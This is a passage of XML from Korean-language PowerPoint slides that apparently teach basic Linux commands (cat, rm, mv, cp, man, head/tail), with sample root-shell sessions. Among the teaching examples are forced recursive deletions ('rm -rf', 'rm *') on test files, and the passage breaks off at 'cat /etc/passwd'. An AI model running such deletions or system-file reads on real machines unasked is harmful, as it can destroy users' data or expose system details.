                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>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test4</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 -al &gt; file2</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cat file1 file2</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100"/>
                <a:t>합계 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>8</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0  2</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100"/>
                <a:t>월 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>22 15:25 file1</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0  6</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100"/>
                <a:t>월 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>14  2021 newfile</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0  2</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100"/>
                <a:t>월 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>22 15:08 oldfile</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>drwxrwxr</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>-x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test3</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>drwxrwxrwx</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>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test4</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100"/>
                <a:t>합계 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>20</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>drwxr</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>-</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>xr</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>-x 4 root </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>root</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t> 4096  2</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100"/>
                <a:t>월 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>22 15:25 .</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>drwxr</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>-</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>xr</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>-x 3 root </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>root</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t> 4096  2</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100"/>
                <a:t>월 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="110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cat -n file1</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>     1  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100"/>
                <a:t>합계 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>8</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>     2  -</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>rw</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>-r--r-- 1 root </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>root</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>    0  2</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100"/>
                <a:t>월 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>22 15:25 file1</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>     3  -</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>rw</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>-r--r-- 1 root </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>root</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>    0  6</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100"/>
                <a:t>월 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>14  2021 newfile</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>     4  -</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>rw</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>-r--r-- 1 root </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>root</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>    0  2</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100"/>
                <a:t>월 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>22 15:08 oldfile</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>     5  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>drwxrwxr</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>-x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test3</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>     6  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>drwxrwxrwx</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t> 2 root </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>root</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t> 4096  2</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100"/>
                <a:t>월 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>22 15:03 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100">
                  <a:solidFill>
                    <a:srgbClr val="7030A0"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>test4</a:t>
              </a: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cat &gt; file3</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>test file...                                       </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>: ctrl d </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100"/>
                <a:t>로 저장한다</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a: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cat file3</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>test file...</a:t>
              </a:r>
            </a:p>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/Theory/T2/7</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="4400" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t># rm : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="4400" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>파일이나 디렉토리를 삭제</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a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>file2  file3  newfile  oldfile  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100">
                  <a:solidFill>
                    <a:srgbClr val="7030A0"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>test3  test4</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rm file*</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>rm: remove </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100"/>
                <a:t>일반 파일 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>`file2'? </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100">
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>y</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>rm: remove </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100"/>
                <a:t>일반 파일 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>`file3'? </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100">
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>y</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a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>newfile  oldfile  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100">
                  <a:solidFill>
                    <a:srgbClr val="7030A0"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>test3  test4</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rm -r test3/</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>rm: remove </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100"/>
                <a:t>디렉토리 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>`test3/’? </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100">
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>Y</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:endParaRP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a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>newfile  oldfile  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100">
                  <a:solidFill>
                    <a:srgbClr val="7030A0"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>test4</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100"/>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rm -rf test4/       </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>: force, </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100"/>
                <a:t>강제로 삭제한다</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>.</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a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>newfile  oldfile</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rm *</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>rm: remove </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100"/>
                <a:t>일반 빈 파일 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>`newfile'? </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100">
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>y</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>rm: remove </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100"/>
                <a:t>일반 빈 파일 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>`oldfile'? </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100">
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>y</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100">
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>[</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1">
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>root@localhost</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100">
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t> test2]# ls</a:t>
              </a:r>
            </a:p>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/Theory/T2/8</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mv</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파일 혹은 디렉토리 이동</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touch file1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ls</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>File1</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100"/>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mv file1 file2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ls</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>File2</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100"/>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a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>mkdir</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> dir1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touch file1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ls</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100">
                  <a:solidFill>
                    <a:srgbClr val="7030A0"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>dir1</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>  file1  file2</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100"/>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mv file1 dir1/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ls</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100">
                  <a:solidFill>
                    <a:srgbClr val="7030A0"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>dir1</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>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test2]# cd dir1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ls</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>file1</a:t>
              </a:r>
            </a:p>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/Theory/T2/9</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cp</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파일 혹은 디렉토리를 복사</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ls</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>File1</a:t>
              </a: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cp file1 file2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ls</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>file1  file2</a:t>
              </a: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a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>mkdir</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> dir1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cp file1 file2 dir1/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ls dir1/</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>file1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/Theory/T2/10</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="4400" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t># man : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="4400" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>리눅스 매뉴얼 출력</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man cp</a:t>
              </a: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r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>:</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>q</a:t>
              </a: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dir1]# cp --help</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>Usage: cp [OPTION]... [-T] SOURCE DEST</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>  or:  cp [OPTION]... SOURCE... DIRECTORY</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>  or:  cp [OPTION]... -t DIRECTORY SOURCE...</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>Copy SOURCE to DEST, or multiple SOURCE(s) to DIRECTORY.</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100"/>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100"/>
                <a:t>긴 옵션에서 꼭 필요한 인수는 짧은 옵션에도 꼭 필요합니다</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>.</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>  -a, --archive                same as -</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>dR</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t> --preserve=all</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>      --backup[=CONTROL]       make a backup of each existing destination file</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>  -b                           like --backup but does not accept an argument</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="110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/Theory/T2/11</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head/tail</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보고싶은 줄 수만큼 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>출력</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log]# cat /etc/passwd</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
